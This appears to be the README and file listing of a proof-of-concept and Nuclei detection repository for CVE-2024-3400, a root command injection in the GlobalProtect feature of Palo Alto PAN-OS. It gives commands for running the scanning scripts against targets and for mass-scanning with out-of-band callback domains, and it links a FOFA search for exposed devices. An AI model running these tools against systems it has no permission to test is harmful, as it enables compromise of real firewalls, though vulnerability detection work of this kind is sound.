CVE-2024-3400 PoC — PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect

Associated Vulnerability
Title: PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect (CVE-2024-3400)
Description: A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Readme
# CVE-2024-3400

![POC](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-POC-1.jpg)

![telemet](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-Nuclei-Template.jpg)
# Description

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

# CVE-2024-3400 Nuclei Template for Palo Alto PAN-OS Vulnerability

This repository contains a Nuclei Template designed to detect vulnerabilities related to Palo Alto PAN-OS bugs, specifically targeting CVE-2024-3400. 

Comprehensive research on this vulnerability has been published by:

[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis

[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

## Vulnerabilities Detected

- **0 Byte File Creation**: The Bash script uses a curl request to check whether this vulnerability allows a 0-byte file to be created.
- **OS Command Injection**: The Nuclei Template detects potential OS command injection vulnerabilities.

## Usage

### Bash Script

Execute the following command to run the Bash script:
```sh
./CVE-2024-3400.sh http://target
# or
sh CVE-2024-3400.sh http://target
```

The script first checks whether a file is created (a 200 OK status is returned). If that succeeds, it then verifies that the file exists (a 403 Forbidden status is returned).

### Nuclei Template - telemet.yaml

1. Start an Interactsh client:

```sh
interactsh-client -v
```

2. Run the Nuclei Template:

```sh
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
```

3. Boom Boom Template! (GET subdomain from https://dig.pm)

```sh
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
```

## Potential Targets

A list of potential targets can be found [here](https://en.fofa.info/result?qbase64=YmFubmVyPSJHbG9iYWwgUHJvdGVjdCI%3D).

```sh
python fofax3r.py
```

## Author

- **Author**: 자전거, 自転車, 自行车

File Snapshot

[4.0K] /data/pocs/ac0485caad41e12ed249553a7fa8925c81d50963
├── [351K] CVE-2024-3400-Nuclei-Template.jpg
├── [140K] CVE-2024-3400-POC-1.jpg
├── [ 844] CVE-2024-3400.sh
├── [1.7K] CVE20243400.yaml
├── [1.7K] fofax3r.py
├── [2.4K] README.md
└── [ 733] telemet.yaml

0 directories, 7 files